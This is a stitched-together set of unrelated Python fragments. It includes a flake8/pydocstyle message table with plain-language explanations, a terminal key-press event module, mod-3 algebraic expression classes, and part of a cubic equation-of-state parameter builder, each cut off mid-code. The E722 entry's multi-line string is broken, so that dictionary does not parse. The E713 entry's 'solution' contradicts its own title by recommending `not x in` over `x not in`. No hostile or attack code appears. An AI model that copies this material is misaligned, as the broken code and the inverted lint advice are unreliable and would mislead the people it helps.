f" pcm={l_float_z_pcm:.3f}/0,"
f" df={l_float_z_df:.3f},"
f" area={l_float_z_area:.3f}/m2,"
f" cl={l_float_z_cl:.3f}/0,"
f" dtw={l_float_z_dtw:.3f}")
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if False:
# Display data in matplotlib window
canp_view_mpl.display([
l_narr_x_can, l_narr_x_ref,
l_narr_y_can, l_narr_y_ref,
l_narr_z_can, l_narr_z_ref],
CANP_TEST__ARR_TMP,
CANP_TEST__ARR_POS,)
print("canp_view_mpl done")
if False:
# Display data in DearPyGui (0.6.x) window
canp_view_dpg.display([
# | |
be ‘not in’",
"title_templated": False,
"title": "When testing whether or not something is in an object use the form `x not in the_object` instead of `not x in the_object`.",
"solution": "Use the form `not x in the_object` instead of `x not in the_object`.",
"explanation": "This improves readability of your code as it reads more naturally."
},
"E714": {
"original_message": "test for object identity should be ‘is not’",
"title_templated": False,
"title": "When testing for object identity use the form `x is not None` rather than `not x is None`.",
"solution": "Use the form `x is not None` rather than `not x is None`.",
"explanation": "This improves readability of your code as it reads more naturally."
},
"E721": {
"original_message": "do not compare types, use ‘isinstance()’",
"title_templated": False,
"title": "You should compare an objects type by using `isinstance()` instead of `==`. This is because `isinstance` can handle subclasses as well.",
"solution": "Use `if isinstance(dog, Animal)` instead of `if type(dog) == Animal`.",
"explanation": ""
},
"E722": {
"original_message": "do not use bare except, specify exception instead",
"title_templated": False,
"title": "Except block is calling all exceptions, instead it should catch a specific exception.",
"solution": """
Add the specific exception the block is expected to catch; you may need to use multiple `except` blocks if you were catching multiple exceptions.
For example:
"explanation": "This helps other to know exactly what the `except` is expected to catch."
},
"E731": {
"original_message": "do not assign a lambda expression, use a def",
"title_templated": False,
"title": "Line assigns a lambda expression instead of defining it as a function using `def`.",
"solution": "Define the line as a function using `def`.",
"explanation": "The primary reason for this is debugging. Lambdas show as `<lambda>` in tracebacks, where functions will display the function’s name."
},
"E741": {
"original_message": "do not use variables named `l`, `O`, or `I`",
"title_templated": False,
"title": "Line uses one of the variables named `l`, `O`, or `I`",
"solution": "Change the names of these variables to something more descriptive.",
"explanation": "Variables named `l`, `O`, or `I` can be very hard to read. This is because the letter `I` and the letter `l` are easily confused, and the letter `O` and the number `0` can be easily confused."
},
"E742": {
"original_message": "do not define classes named `l`, `O`, or `I`",
"title_templated": False,
"title": "Line contains a class named `l`, `O`, or `I`",
"solution": "Change the names of these classes to something more descriptive.",
"explanation": "Classes named `l`, `O`, or `I` can be very hard to read. This is because the letter `I` and the letter `l` are easily confused, and the letter `O` and the number `0` can be easily confused."
},
"E743": {
"original_message": "do not define functions named `l`, `O`, or `I`",
"title_templated": False,
"title": "Line contains a function named `l`, `O`, or `I`",
"solution": "Change the names of these functions to something more descriptive.",
"explanation": "Functions named `l`, `O`, or `I` can be very hard to read. This is because the letter `I` and the letter `l` are easily confused, and the letter `O` and the number `0` can be easily confused."
},
"E999": {
"original_message": "Syntax error",
"title_templated": False,
"title": "Program failed to compile.",
"solution": "Make sure your code is working.",
"explanation": ""
},
# TODO: Continue from this point onwards with checking text and adding templating boolean
"W191": {
"original_message": "indentation contains tabs",
"title_templated": False,
"title": "Line contains tabs when only spaces are expected.",
"solution": "Replace any tabs in your indentation with spaces.",
"explanation": "Using a consistent character for whitespace makes it much easier for editors to read your file."
},
"W291": {
"original_message": "trailing whitespace",
"title_templated": False,
"title": "Line contains whitespace after the final character.",
"solution": "Remove any extra whitespace at the end of each line.",
"explanation": ""
},
"W292": {
"original_message": "no newline at end of file",
"title_templated": False,
"title": "Files should end with a newline.",
"solution": "Add a newline to the end of your file.",
"explanation": "All text files should automatically end with a new line character, but some code editors can allow you to remove it."
},
"W293": {
"original_message": "blank line contains whitespace",
"title_templated": False,
"title": "Blank lines should not contain any tabs or spaces.",
"solution": "Remove any whitespace from blank lines.",
"explanation": ""
},
"W391": {
"original_message": "blank line at end of file",
"title_templated": False,
"title": "There are either zero, two, or more than two blank lines at the end of your file.",
"solution": "Ensure there is only one blank line at the end of your file.",
"explanation": ""
},
# W503 ignored by default
# This seems contradicting... https://lintlyci.github.io/Flake8Rules/rules/W503.html
"W503": {
"original_message": "line break before binary operator",
"title_templated": False,
"title": "Line break is before a binary operator.",
"solution": "",
"explanation": ""
},
# W504 ignored by default
# same as above https://lintlyci.github.io/Flake8Rules/rules/W504.html
"W504": {
"original_message": "line break after binary operator",
"title_templated": False,
"title": "Line break is after a binary operator.",
"solution": "",
"explanation": ""
},
# W505 ignored by default
"W505": {
"original_message": "doc line too long (82 > 79 characters)",
"title_templated": False,
"title": "Line is longer than 79 characters.",
"solution": "You should rewrite your long line of code by breaking it down across multiple lines.",
"explanation": "By making sure your lines of code are not too complicated means it's easier to understand by other people. Also by limiting the line width makes it possible to have several files open side-by-side, and works well when using code review tools that present the two versions in adjacent columns."
},
"W601": {
"original_message": ".has_key() is deprecated, use ‘in’",
"title_templated": False,
"title": "`.has_key()` was deprecated in Python 2. It is recommended to use the `in` operator instead.",
"solution": """
Use `in` instead of `.has_key()`.
For example:
```
if 8054 in postcodes:
```
""",
"explanation": ""
},
"W602": {
"original_message": "deprecated form of raising exception",
"title_templated": False,
"title": "Using `raise ExceptionType, message` is not supported.",
"solution": "Instead of using `raise ExceptionType, 'Error message'`, passing the text as a parameter to the exception, like `raise ExceptionType('Error message')`.",
"explanation": ""
},
"W603": {
"original_message": "‘<>’ is deprecated, use ‘!=’",
"title_templated": False,
"title": "`<>` has been removed in Python 3.",
"solution": "Replace any occurences of `<>` with `!=`.",
"explanation": "The `!=` is the common programming symbols for stating not equal."
},
"W604": {
"original_message": "backticks are deprecated, use ‘repr()’",
"title_templated": False,
"title": "Backticks have been removed in Python 3.",
"solution": "Use the built-in function `repr()` instead.",
"explanation": ""
},
"W605": {
"original_message": "invalid escape sequence ‘x’",
"title_templated": False,
"title": "Backslash is used to escape a character that cannot be escaped.",
"solution": "Either don't use the backslash, or check your string is correct.",
"explanation": ""
},
"W606": {
"original_message": "`async` and `await` are reserved keywords starting with Python 3.7",
"title_templated": False,
"title": "`async` and `await` are reserved names",
"solution": "Do not name variables or functions as `async` or `await`.",
"explanation": ""
},
"D100": {
"original_message": "Missing docstring in public module",
"title_templated": False,
"title": "Module (the term for the Python file) should have a docstring.",
"solution": "Add a docstring to your module.",
"explanation": """
A docstring is a special comment at the top of your module that briefly explains the purpose of the module. It should start and end with three double quotation marks (\"\"\").
For example:
```
\"\"\"This file calculates required dietary requirements for kiwis.
```
"""
},
"D101": {
"original_message": "Missing docstring in public class",
"title_templated": False,
"title": "Class should have a docstring.",
"solution": "Add a docstring to your class.",
"explanation": """
A docstring is a special comment at the top of your class that briefly explains the purpose of the class. It should start and end with three double quotation marks (\"\"\").
For example:
```
class Kiwi():
\"\"\"Represents a kiwi bird from New Zealand.\"\"\"
```
"""
},
"D102": {
"original_message": "Missing docstring in public | |
"""
.NET-style event system in Python
The aim of this module is to create an event system using only Python's base installation (e.g. no Anaconda, PyPy, etc.)
"""
if __name__ == "__main__":
# MAJOR +1 represents an added function.
__MAJOR = 1
# MINOR +1 represents a change in existing function(s) within the current MAJOR.
__MINOR = 0
__info = """This file contains the module 'KeyEvent', used to integrate key press events.
To use this module in another project, include this file inside the project's directory."""
print("========================================================")
print("KeyPress.py version ", __MAJOR, ".", __MINOR, sep='', end='\n\n')
print(__info)
print("========================================================\n")
input("Press enter to continue...")
#========================Imports========================
# Used by:
import os
from lib.Utils import *
from lib.EventSystem import *
#========================Common Functions========================
# no function
#========================KeyPressEvent classes: KeyPressEventArgs, _KeyPressEventListener, KeyPressEventHandler========================
class KeyPressEventArgs(EventArgs):
def __init__(self, key, key2=b'\x00', **kwargs):
EventArgs.__init__(self, **kwargs)
self.Key = key
self.Key2 = key2
if key2 == b'\x00':
self.isSpecialKey = False
else:
self.isSpecialKey = True
class KeyPressEventListener(EventListener):
def __init__(self, *subscribers):
EventListener.__init__(self, *subscribers)
def notify(self, sender, key, key2=b'\x00'):
"""
Notifies all subscribers about a key press.
Args:
sender: The object that detected the key press.
key: Bytecode of the pressed key.
key2: Optional second bytecode for combination (special function) keys.
"""
EventListener.notify(self, sender, KeyPressEventArgs(key, key2))
class KeyPressEventHandler(EventHandler):
def __init__(self, *subscribers):
if os.name == 'nt':
self._getch = KeyPressEventHandler.__WindowsKeyPress()
else: # fallback method. Most likely os.name == 'posix'
self._getch = KeyPressEventHandler.__UnixKeyPress()
EventHandler.__init__(self, KeyPressEventListener(*subscribers))
def readkey(self, decode=False):
"""
Updates methods and functions subscribed to this event handler.
Any subscriber must implement the exact parameters: subscriber(sender, args: KeyPressEventArgs)
where parameter 'args' contains the string character mapped from the pressed key.
Args:
decode: Whether to decode the key code into the corresponding character.
"""
if os.name == 'nt':
# _getch() in Windows returns a set of two user inputs in latin1 encoding
keycodes = []
# We need to call _getch() up to 2 times per user key input in order to catch combination keys (e.g. Delete key).
for i in range(2):
keycodes.append(self._getch())
if keycodes[0] != KeyCodes.Null and keycodes[0] != KeyCodes.FunctionPrefix:
# If the first key code is not a prefix to a combination key, it is a normal ASCII character.
# In this instance, default the second key code to null and do not detect key input anymore.
keycodes.insert(1, KeyCodes.Null)
break
# Option to decode the key. Bad idea if wanting to detect function keys such as 'Esc'.
if decode:
# Updates the _KeyPressEventListener
self.Listener.notify(self, KeyCodes.tostring(keycodes[0], keycodes[1]))
elif keycodes[1] == b'\x00':
# A key which can be represented as a single Unicode character
self.Listener.notify(self, keycodes[0])
else:
# A special function key that is represented as a combination of two Unicode characters
self.Listener.notify(self, keycodes[0], keycodes[1])
else:
keycode = self._getch()
# Option to decode the key. Bad idea if wanting to detect function keys such as 'Esc'.
if decode:
keycode = keycode.decode('latin1')
# Updates the _KeyPressEventListener
self.Listener.notify(self, keycode)
class __UnixKeyPress:
"""
Credits:
http://code.activestate.com/recipes/134892/
"""
def __init__(self):
try:
import tty, sys
except ImportError as e:
WriteShell("An error occurred while importing module '", e.name,
"' for KeyPressEventHandler initialization. Does this system lack the required module?",
sep='', stderr=True, Color='error', flush=True)
def __call__(self):
try:
import sys, tty, termios
stdin_file = sys.stdin.fileno()
tty_attr = termios.tcgetattr(stdin_file)
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
except ImportError as impE:
WriteShell("An error occurred while importing module '", impE.name,
"' when calling KeyPressEventHandler. Does this system lack the required modules?",
sep='', stderr=True, Color='error', flush=True)
finally:
termios.tcsetattr(stdin_file, termios.TCSADRAIN, tty_attr)
return ch
class __WindowsKeyPress:
"""
Credits:
http://code.activestate.com/recipes/134892/
"""
def __init__(self):
try:
import msvcrt
except ImportError as e:
WriteShell("An error occurred while importing module '", e.name,
"' for KeyPressEventHandler initialization. Does this system lack the required module?",
sep='', stderr=True, Color='error', flush=True)
def __call__(self):
try:
import msvcrt
return msvcrt.getch()
except ImportError as impE:
WriteShell("An error occurred while importing module '", impE.name,
"' when calling KeyPressEventHandler. Does this system lack the required module?",
sep='', stderr=True, Color='error', flush=True)
class KeyCodes:
"""
This class contains bytecodes of common unicode characters.
"""
# For special function keys, Python's msvcrt module will return this prefix, followed by the function key's bytecode
FunctionPrefix = b'\xe0'
Null = b'\x00'
Backspace = b'\x08'
BackspaceChar = b'\x7f' # For legacy purposes; deprecated
Escape = b'\x1b'
Enter = b'\n' # Ctrl + Enter/Return or Ctrl + J
Return = b'\r' # Enter/Return or Ctrl + M
Tab = b'\t' # Tab or Ctrl + I
CtrlZ = b'\x1a' # Undo
CtrlX = b'\x18' # Cut
CtrlC = b'\x03' # Copy
CtrlV = b'\x16' # Paste
CtrlB = b'\x02' # Embolden
CtrlN = b'\x0e' # New Item
CtrlM = Return
CtrlA = b'\x01' # Select All
CtrlS = b'\x13' # Save Item
CtrlD = b'\x04'
CtrlF = b'\x06' # Find
CtrlG = b'\x07'
CtrlH = b'\x08'
CtrlJ = Enter
CtrlK = b'\x0b'
CtrlL = b'\x0c'
CtrlQ = b'\x11' # Quit
CtrlW = b'\x17'
CtrlE = b'\x05' # Center
CtrlR = b'\x12'
CtrlT = b'\x14'
CtrlY = b'\x19' # Redo
CtrlU = b'\x15' # Underline
CtrlI = Tab
CtrlO = b'\x0f' # Open Item
CtrlP = b'\x10' # Print
Zero = b'0'
One = b'1'
Two = b'2'
Three = b'3'
Four = b'4'
Five = b'5'
Six = b'6'
Seven = b'7'
Eight = b'8'
Nine = b'9'
CommercialAt = b'@'
NumberSign = b'#'
DollarSign = b'$'
PercentSign = b'%'
Caret = b'^'
Ampersand = b'&'
Grave = b'`'
Tilde = b'~'
Space = b' '
ExclamationMark = b'!'
QuestionMark = b'?'
QuotationMark = b'"'
Apostrophe = b"'"
Comma = b','
Period = b'.'
Colon = b':'
Semicolon = b';'
LeftParenthesis = b'('
RightParenthesis = b')'
LeftBracket = b'['
RightBracket = b']'
LeftCurlyBracket = b'{'
RightCurlyBracket = b'}'
LeftAngleBracket = b'<'
RightAngleBracket = b'>'
Add = b'+'
Subtract = b'-'
Asterisk = b'*'
Slash = b'/'
Backslash = b'\\'
Equal = b'='
Underscore = b'_'
A = b'A'
B = b'B'
C = b'C'
D = b'D'
E = b'E'
F = b'F'
G = b'G'
H = b'H'
I = b'I'
J = b'J'
K = b'K'
L = b'L'
M = b'M'
N = b'N'
O = b'O'
P = b'P'
Q = b'Q'
R = b'R'
S = b'S'
T = b'T'
U = b'U'
V = b'V'
W = b'W'
X = b'X'
Y = b'Y'
Z = b'Z'
a = b'a'
b = b'b'
c = b'c'
d = b'd'
e = b'e'
f = b'f'
g = b'g'
h = b'h'
i = b'i'
j = b'j'
k = b'k'
l = b'l'
m = b'm'
n = b'n'
o = b'o'
p = b'p'
q = b'q'
r = b'r'
s = b's'
t = b't'
u = b'u'
v = b'v'
w = b'w'
x = b'x'
y = b'y'
z = b'z'
CombinationCharacters = {(FunctionPrefix, H) : 'ArrowUp',
(FunctionPrefix, P) : 'ArrowDown',
(FunctionPrefix, K) : 'ArrowLeft',
(FunctionPrefix, M) : 'ArrowRight',
(Null, Semicolon) : 'F1',
(Null, LeftAngleBracket) : 'F2',
(Null, Equal) : 'F3',
(Null, RightAngleBracket) : 'F4',
(Null, QuestionMark) : 'F5',
(Null, CommercialAt) : 'F6',
(Null, A) : 'F7',
(Null, B) : 'F8',
(Null, C) : 'F9',
(Null, D) : 'F10',
(FunctionPrefix, b'\x85') : 'F11',
(FunctionPrefix, b'\x86') : 'F12',
(FunctionPrefix, R) : 'Insert',
(FunctionPrefix, S) : 'Del',
(FunctionPrefix, I) : 'PageUp',
(FunctionPrefix, Q) : 'PageDown',
(FunctionPrefix, G) : 'Home',
(FunctionPrefix, O) : 'End',
(Null, CtrlC) : 'Ctrl+2'}
@staticmethod
def tostring(key1: bytes, key2: bytes=b'\x00'):
"""
Returns the string representation of a key press.
Args:
key1: The first bytecode returned from a keypress
key2: The second bytecode returned from a keypress
Returns:
The decoded character for normal keys, or the name of the combination key (e.g. 'ArrowUp', 'F1').
"""
# Those are normal characters, simply decode to their respective string literals
if key2 == b'\x00':
return key1.decode('latin1')
else:
return KeyCodes.CombinationCharacters[(key1, key2)]
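# Usage sketch (illustrative only; the two helpers below are not part of the module's API):
# subscribe a callback to a KeyPressEventHandler and block until one key press is reported.
# The callback follows the contract documented in readkey(): subscriber(sender, args: KeyPressEventArgs).
def _example_on_key_press(sender, args):
    # args.Key / args.Key2 hold the raw bytecodes of the pressed key.
    if args.isSpecialKey:
        print("Special key:", KeyCodes.tostring(args.Key, args.Key2))
    else:
        print("Key:", KeyCodes.tostring(args.Key))

def _example_read_one_key():
    # Build a handler with one subscriber and block until a key is pressed.
    handler = KeyPressEventHandler(_example_on_key_press)
    handler.readkey(decode=False)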
#========================Version History========================
# 1.0
"""
Initial Release
Refactored from EventSystem.
See version history from EventSystem.py
Additions
---------
-class KeyPressEventArgs implements EventArgs
-__init__(self, key, **kwargs)
-class _KeyPressEventListener implements EventListener
-__init__(self, *subscribers)
-notify(self, sender, key)
-class KeyPressEventHandler implements EventHandler
-__init__(self, *subscribers)
-readkey(self)
-class UnixKeyPress
-__init__(self)
-__call__(self)
-class WindowsKeyPress
-__init__(self)
-__call__(self)
-class KeyCodes
-Defined constants (under this class) for all latin1 unicode characters
-CombinationCharacters dictionary for special keyboard functions that cannot be represented as a | |
= 'mod3max'
elif self._function_name == 'MIN':
func_name = 'mod3min'
elif self._function_name == 'CONT':
func_name = 'mod3continuity'
elif self._function_name == 'NOT':
func_name = 'mod3not'
else:
raise Exception("Unknown binary relation: " + self._function_name)
return func_name + '(' + ",".join(c_exprs) + ')'
def as_polynomial(self):
expressions_as_polynomials = [mod_3(expr) if is_integer(expr)
else expr.as_polynomial()
for expr in self._expression_list]
if self._function_name == 'MAX':
assert len(expressions_as_polynomials) == 2, "wrong number of arguments for MAX"
return max3(expressions_as_polynomials[0], expressions_as_polynomials[1])
elif self._function_name == 'MIN':
assert len(expressions_as_polynomials) == 2, "wrong number of arguments for MIN"
return min3(expressions_as_polynomials[0], expressions_as_polynomials[1])
elif self._function_name == 'CONT':
assert len(expressions_as_polynomials) == 2, "wrong number of arguments for CONT"
return expressions_as_polynomials[1].continuous_polynomial_version(expressions_as_polynomials[0])
elif self._function_name == 'NOT':
assert len(expressions_as_polynomials) == 1, "wrong number of arguments for NOT"
return not3(expressions_as_polynomials[0])
else:
raise Exception("cannot evaluate unknown function " + self._function_name + " as a polynomial")
# def as_sympy(self):
#
# def cont_sympy(control, expr):
# return expr if is_integer(expr) \
# else expr.continuous_polynomial_version(control)
#
# def not_sympy(expr):
# return 1 - expr
#
# # tuples are param-count, function
# functions = {'MAX': (2, sympy.Max),
# 'MIN': (2, sympy.Min),
# 'CONT': (2, cont_sympy),
# 'NOT': (1, not_sympy)}
#
# if self._function_name not in functions:
# raise Exception("cannot evaluate unknown function " + self._function_name + " as a sympy expression")
#
# if len(self._expression_list) != functions[self._function_name][0]:
# raise Exception(f"Wrong number of arguments for {self._function_name}")
#
# function = functions[self._function_name][1]
#
# sympy_expressions = [sympy.Mod(expr, 3) if is_integer(expr)
# else sympy.Mod(expr.as_sympy(), 3)
# for expr in self._expression_list]
# return function(*sympy_expressions)
def as_numpy_str(self, variables) -> str:
np_parameter_strings = [str(expr) if is_integer(expr)
else expr.as_numpy_str(variables)
for expr in self._expression_list]
# this one is slow
# continuous_str = "( (({1})>({0})) * (({0})+1) + (({1})<({0})) * (({0})-1) + (({1})==({0}))*({0}) )"
continuous_str = "( {0}+np.sign(np.mod({1},3)-np.mod({0},3)) )"
max_str = "np.maximum(np.mod({0},3),np.mod({1},3))"
min_str = "np.minimum(np.mod({0},3),np.mod({1},3))"
not_str = "(2-({0}))"
# tuples are param-count, function
function_strings = {'MAX': (2, max_str),
'MIN': (2, min_str),
'CONT': (2, continuous_str),
'NOT': (1, not_str)}
if self._function_name not in function_strings:
raise Exception("cannot evaluate unknown function " + self._function_name + " as a numpy function")
if len(self._expression_list) != function_strings[self._function_name][0]:
raise Exception(f"Wrong number of arguments for {self._function_name}")
function = function_strings[self._function_name][1]
return function.format(*np_parameter_strings)
def get_variable_set(self):
var_set = set()
for expr in self._expression_list:
if not is_integer(expr):
var_set = var_set.union(expr.get_variable_set())
return var_set
class BinaryOperation(Expression):
def __init__(self, relation_name, left_expression: Union[Expression, int],
right_expression: Union[Expression, int]):
self.relation_name = relation_name
self._left_expression: Union[Expression, int] = left_expression
self._right_expression: Union[Expression, int] = right_expression
def rename_variables(self, name_dict: Dict[str, str]):
renamed_left_expression = rename_helper(self._left_expression, name_dict)
renamed_right_expression = rename_helper(self._right_expression, name_dict)
return BinaryOperation(self.relation_name,
left_expression=renamed_left_expression,
right_expression=renamed_right_expression)
def is_constant(self):
return (is_integer(self._left_expression) or self._left_expression.is_constant()) and \
(is_integer(self._right_expression) or self._right_expression.is_constant())
def eval(self, variable_dict):
"""
evaluate parameters, making them ints if possible
:param variable_dict: a dictionary mapping either single-term monomials or strings (variable names) to ints
:return: evaluated expression
"""
evaled_left_expr = self._left_expression if is_integer(self._left_expression) \
else self._left_expression.eval(variable_dict)
evaled_left_expr = int(evaled_left_expr) \
if is_integer(evaled_left_expr) or evaled_left_expr.is_constant() \
else evaled_left_expr
evaled_right_expr = self._right_expression if is_integer(self._right_expression) \
else self._right_expression.eval(variable_dict)
evaled_right_expr = int(evaled_right_expr) \
if is_integer(evaled_right_expr) or evaled_right_expr.is_constant() \
else evaled_right_expr
if self.relation_name == 'PLUS':
return evaled_left_expr + evaled_right_expr
elif self.relation_name == 'MINUS':
return evaled_left_expr - evaled_right_expr
elif self.relation_name == 'TIMES':
return evaled_left_expr * evaled_right_expr
elif self.relation_name == 'EXP':
return evaled_left_expr ** evaled_right_expr
else:
raise Exception("cannot evaluate unknown binary op: " + self.relation_name)
def __str__(self):
short_relation_name = "?"
if self.relation_name == 'PLUS':
short_relation_name = '+'
elif self.relation_name == 'MINUS':
short_relation_name = '-'
elif self.relation_name == 'TIMES':
short_relation_name = '*'
elif self.relation_name == 'EXP':
short_relation_name = '^'
left_side = str(self._left_expression)
if isinstance(self._left_expression, BinaryOperation):
left_side = "(" + left_side + ")"
right_side = str(self._right_expression)
if isinstance(self._right_expression, BinaryOperation):
right_side = "(" + right_side + ")"
return left_side + short_relation_name + right_side
__repr__ = __str__
def as_c_expression(self):
if is_integer(self._left_expression):
left_c_expr = str(self._left_expression)
else:
left_c_expr = self._left_expression.as_c_expression()
if is_integer(self._right_expression):
right_c_expr = str(self._right_expression)
else:
right_c_expr = self._right_expression.as_c_expression()
if self.relation_name == 'PLUS':
return '(' + left_c_expr + ')+(' + right_c_expr + ')'
elif self.relation_name == 'MINUS':
return '(' + left_c_expr + ')-(' + right_c_expr + ')'
elif self.relation_name == 'TIMES':
return '(' + left_c_expr + ')*(' + right_c_expr + ')'
elif self.relation_name == 'EXP':
return 'mod3pow(' + left_c_expr + ',' + right_c_expr + ')'
else:
raise Exception("Unknown binary relation: " + self.relation_name)
def as_polynomial(self):
if is_integer(self._left_expression):
left_poly = self._left_expression
else:
left_poly = self._left_expression.as_polynomial()
if is_integer(self._right_expression):
right_poly = self._right_expression
else:
right_poly = self._right_expression.as_polynomial()
if self.relation_name == 'PLUS':
return left_poly + right_poly
elif self.relation_name == 'MINUS':
return left_poly - right_poly
elif self.relation_name == 'TIMES':
return left_poly * right_poly
elif self.relation_name == 'EXP':
# simplify the exponent = 0, 1 cases
if is_integer(right_poly):
if right_poly == 0:
return 1
elif right_poly == 1:
return left_poly
else:
return left_poly ** right_poly
else:
return left_poly ** right_poly
else:
raise Exception("Unknown binary relation: " + self.relation_name)
# def as_sympy(self):
# """
# Convert to sympy expression
# Returns
# -------
# sympy expression
# """
#
# def simple_pow(left_exp, right_exp):
# # simplify the exponent = 0, 1 cases
# if is_integer(right_exp):
# if right_exp == 0:
# return 1
# elif right_exp == 1:
# return left_exp
# else:
# return left_exp ** right_exp
# else:
# return left_exp ** right_exp
#
# relations = {'PLUS': operator.add,
# 'MINUS': operator.sub,
# 'TIMES': operator.mul,
# 'EXP': simple_pow}
#
# if self.relation_name not in relations:
# raise Exception("Unknown binary relation: " + self.relation_name)
#
# lhs = self._left_expression if is_integer(self._left_expression) else self._left_expression.as_sympy()
# rhs = self._right_expression if is_integer(self._right_expression) else self._right_expression.as_sympy()
#
# return relations[self.relation_name](lhs, rhs)
def as_numpy_str(self, variables) -> str:
"""
Convert to numpy function
Parameters
----------
variables
Returns
-------
str version of numpy function
"""
relations = {'PLUS': "(({0})+({1}))",
'MINUS': "(({0})-({1}))",
'TIMES': "(({0})*({1}))",
'EXP': "(({0})**({1}))"}
if self.relation_name not in relations:
raise Exception("Unknown binary relation: " + self.relation_name)
lhs = str(self._left_expression) if is_integer(self._left_expression) \
else self._left_expression.as_numpy_str(variables)
rhs = str(self._right_expression) if is_integer(self._right_expression) \
else self._right_expression.as_numpy_str(variables)
return relations[self.relation_name].format(lhs, rhs)
def get_variable_set(self):
var_set = set()
if not is_integer(self._left_expression):
var_set = var_set.union(self._left_expression.get_variable_set())
if not is_integer(self._right_expression):
var_set = var_set.union(self._right_expression.get_variable_set())
return var_set
class UnaryRelation(Expression):
def __init__(self, relation_name, expr):
self._relation_name = relation_name
self._expr = expr
def rename_variables(self, name_dict: Dict[str, str]):
return UnaryRelation(relation_name=self._relation_name,
expr=rename_helper(self._expr, name_dict))
def is_constant(self):
return self._expr.is_constant()
def eval(self, variable_dict):
if self._relation_name == 'MINUS':
if is_integer(self._expr):
return (-1) * self._expr
elif isinstance(self._expr, Expression):
evaluated_subexpression = self._expr.eval(variable_dict)
if is_integer(evaluated_subexpression) or evaluated_subexpression.is_constant():
return (-1) * int(evaluated_subexpression)
else:
return (-1) * evaluated_subexpression
else:
raise Exception("UnaryRelation in bad state with unknown unary relation name")
def __str__(self) -> str:
short_rel_name = str(self._relation_name)
if self._relation_name == 'MINUS':
short_rel_name = '-'
return short_rel_name + (
"(" + str(self._expr) + ")" if type(self._expr) == BinaryOperation else str(self._expr))
__repr__ = __str__
def as_c_expression(self):
if is_integer(self._expr):
c_exp = str(mod_3(self._expr))
else:
c_exp = self._expr.as_c_expression()
if self._relation_name == 'MINUS':
return '-(' + c_exp + ')'
else:
raise Exception("Unknown binary relation: " + self._relation_name)
def as_polynomial(self):
if is_integer(self._expr) or self._expr.is_constant():
poly = mod_3(int(self._expr))
else:
poly = self._expr.as_polynomial()
if self._relation_name == 'MINUS':
return (-1) * poly
else:
raise Exception("Unknown unary relation: " + self._relation_name)
def as_sympy(self):
"""
Convert to sympy expression
Returns
-------
sympy expression
"""
relations = {'MINUS': operator.neg}
if self._relation_name not in relations:
raise Exception("Unknown unary relation: " + self._relation_name)
expr = self._expr if is_integer(self._expr) else self._expr.as_sympy()
return relations[self._relation_name](expr)
def as_numpy_str(self, variables):
"""
Convert to numpy function
Parameters
----------
variables
Returns
-------
str numpy-representation
"""
relations = {'MINUS': "(-({0}))"}
if self._relation_name not in relations:
raise Exception("Unknown unary relation: " + self._relation_name)
expr_str = str(self._expr) if is_integer(self._expr) \
else self._expr.as_numpy_str(variables)
return relations[self._relation_name].format(expr_str)
def get_variable_set(self):
if is_integer(self._expr):
return set()
else:
return self._expr.get_variable_set()
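# Usage sketch (illustrative only; this helper is not part of the module's API):
# build the expression 2 + (-1) from the classes above and exercise the back-ends.
def _expression_usage_sketch():
    expr = BinaryOperation('PLUS', 2, UnaryRelation('MINUS', 1))
    value = expr.eval({})            # no variables needed; reduces to the int 1
    c_code = expr.as_c_expression()  # "(2)+(-(1))"
    poly = expr.as_polynomial()      # also reduces to the integer 1
    return value, c_code, poly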
####################################################################################################
class Monomial(Expression):
"""A class to encapsulate monomials reduced by x^3-x==0 for all variables x"""
def __init__(self, power_dict: dict):
# copy over only those terms which actually appear
self._power_dict = {str(var): power_dict[var] for var in power_dict if power_dict[var] != 0}
for var in self._power_dict.keys():
# while self._power_dict[var] < 0:
# self._power_dict[var] += 2 <--- replace with below
assert self._power_dict[var] > 0 # b/c x^-1 isn't exactly x (i.e. when x=0)
# while | |
"_a_eq")
am = getattr(m, "_" + cname + "_am_eq")
kappa = getattr(m.params, cname + "_kappa")
return (
2
* sqrt(a[p1, p2, i])
/ am[p1, p2, p3]
* sum(
m.mole_frac_phase_comp[p3, j]
* sqrt(a[p1, p2, j])
* (1 - kappa[i, j])
for j in m.components_in_phase(p3)
)
)
b.add_component(
"_" + cname + "_delta_eq",
Expression(
b.params._pe_pairs, b.phase_component_set, rule=rule_delta_eq
),
)
@staticmethod
def calculate_scaling_factors(b, pobj):
pass
@staticmethod
def build_parameters(b):
param_block = b.parent_block()
if not (b.is_vapor_phase() or b.is_liquid_phase()):
raise PropertyNotSupportedError(
"{} received unrecognized phase "
"name {}. Cubic equation of state supports only Vap and Liq "
"phases.".format(param_block.name, b)
)
if b.config.equation_of_state_options["type"] not in set(
item for item in CubicType
):
raise ConfigurationError(
"{} Unrecognized option for equation of "
"state type: {}. Must be an instance of CubicType "
"Enum.".format(b.name, b.config.equation_of_state_options["type"])
)
ctype = b.config.equation_of_state_options["type"]
b._cubic_type = ctype
cname = ctype.name
# Check to see if ConfigBlock was created by previous phase
if hasattr(param_block, cname + "_eos_options"):
ConfigBlock = getattr(param_block, cname + "_eos_options")
for key, value in b.config.equation_of_state_options.items():
if ConfigBlock[key] != value:
raise ConfigurationError(
"In {}, different {} equation of "
"state options for {} are set in different phases, which is "
"not supported.".format(b.name, cname, key)
)
# Once the options have been validated, we don't have anything
# left to do
mixing_rule_a = ConfigBlock["mixing_rule_a"]
mixing_rule_b = ConfigBlock["mixing_rule_b"]
b._mixing_rule_a = mixing_rule_a
b._mixing_rule_b = mixing_rule_b
return
setattr(param_block, cname + "_eos_options", deepcopy(CubicConfig))
ConfigBlock = getattr(param_block, cname + "_eos_options")
ConfigBlock.set_value(b.config.equation_of_state_options)
mixing_rule_a = ConfigBlock["mixing_rule_a"]
mixing_rule_b = ConfigBlock["mixing_rule_b"]
b._mixing_rule_a = mixing_rule_a
b._mixing_rule_b = mixing_rule_b
kappa_data = param_block.config.parameter_data[cname + "_kappa"]
param_block.add_component(
cname + "_kappa",
Var(
param_block.component_list,
param_block.component_list,
within=Reals,
initialize=kappa_data,
doc=cname + " binary interaction parameters",
units=None,
),
)
if b._cubic_type == CubicType.PR:
func_fw = func_fw_PR
elif b._cubic_type == CubicType.SRK:
func_fw = func_fw_SRK
else:
raise BurntToast(
"{} received unrecognized cubic type. This should "
"never happen, so please contact the IDAES developers "
"with this bug.".format(b.name)
)
setattr(param_block, cname + "_func_fw", func_fw)
setattr(param_block, cname + "_func_alpha", func_alpha_soave)
setattr(param_block, cname + "_func_dalpha_dT", func_dalpha_dT_soave)
